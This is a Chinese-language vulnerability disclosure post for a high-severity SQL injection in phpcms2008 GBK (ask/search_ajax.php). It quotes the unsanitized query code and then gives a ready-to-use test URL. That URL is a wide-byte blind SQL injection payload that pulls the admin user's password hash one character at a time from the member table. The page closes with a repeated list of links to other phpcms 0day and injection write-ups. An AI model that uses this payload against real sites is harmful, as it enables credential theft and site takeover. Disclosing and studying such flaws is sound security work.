作者:幻泉[B.S.N]
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
漏洞等级:高
漏洞说明:
/ask/search_ajax.php
Code:
- if($q)
- {
- $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where
- }
- else
- {
- exit('null');
- }
- $infos = $ask->listinfo($where, 'askid DESC', '', 10);
/ask/include/answer.class.php
Code:
- function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
- {
- if($where) $where = " WHERE $where";
- if($order) $order = " ORDER BY $order";
- $page = max(intval($page), 1);
- $offset = $pagesize*($page-1);
- $limit = " LIMIT $offset, $pagesize";
- $r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");
- $number = $r['number'];
- $this->pages = pages($number, $page, $pagesize);
- $array = array();
- $i = 1;
- $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
- while($r = $this->db->fetch_array($result))
- {
- $r['orderid'] = $i;
- $array[] = $r;
- $i++;
- }
- $this->number = $this->db->num_rows($result);
- $this->db->free_result($result);
- return $array;
- }
测试方法:
- /ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
只显示10条记录相关文章
phpcms V9 BLind SQL Injection Vulnerability (浏览: 15092, 评论: 0)
Phpcms 2008 flash_upload.php文件注入漏洞 (浏览: 16024, 评论: 0)
Phpcms 2008 query.php SQL注入漏洞 (浏览: 9255, 评论: 0)
Phpcms 2008 space.api.php SQL注入漏洞 (浏览: 7968, 评论: 0)
很老的一个PHPCMS2008 SP2 0day (浏览: 10069, 评论: 0)
Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行 (浏览: 10945, 评论: 0)
phpcms 0day一枚 (浏览: 13997, 评论: 0)
phpcms2008 sp3通杀0day (浏览: 8565, 评论: 0)
phpcms2008sp4 最新sql注入 (浏览: 9818, 评论: 0)
phpcms2008sp4 IIS下下载任意文件漏洞 (浏览: 11142, 评论: 0)
Phpcms 2008 flash_upload.php文件注入漏洞 (浏览: 16024, 评论: 0)
Phpcms 2008 query.php SQL注入漏洞 (浏览: 9255, 评论: 0)
Phpcms 2008 space.api.php SQL注入漏洞 (浏览: 7968, 评论: 0)
很老的一个PHPCMS2008 SP2 0day (浏览: 10069, 评论: 0)
Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行 (浏览: 10945, 评论: 0)
phpcms 0day一枚 (浏览: 13997, 评论: 0)
phpcms2008 sp3通杀0day (浏览: 8565, 评论: 0)
phpcms2008sp4 最新sql注入 (浏览: 9818, 评论: 0)
phpcms2008sp4 IIS下下载任意文件漏洞 (浏览: 11142, 评论: 0)